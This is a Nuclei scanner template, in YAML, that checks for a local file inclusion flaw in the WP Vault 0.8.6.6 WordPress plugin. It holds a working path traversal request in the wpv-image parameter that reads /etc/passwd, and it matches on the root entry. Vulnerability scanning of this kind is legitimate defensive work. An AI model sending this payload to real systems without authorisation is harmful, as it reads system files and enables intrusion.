nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml

25 lines
508 B
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: wp-vault-local-file-inclusion
info:
name: WP Vault 0.8.6.6 Local File Inclusion
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/40850
tags: wp-plugin,wordpress,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200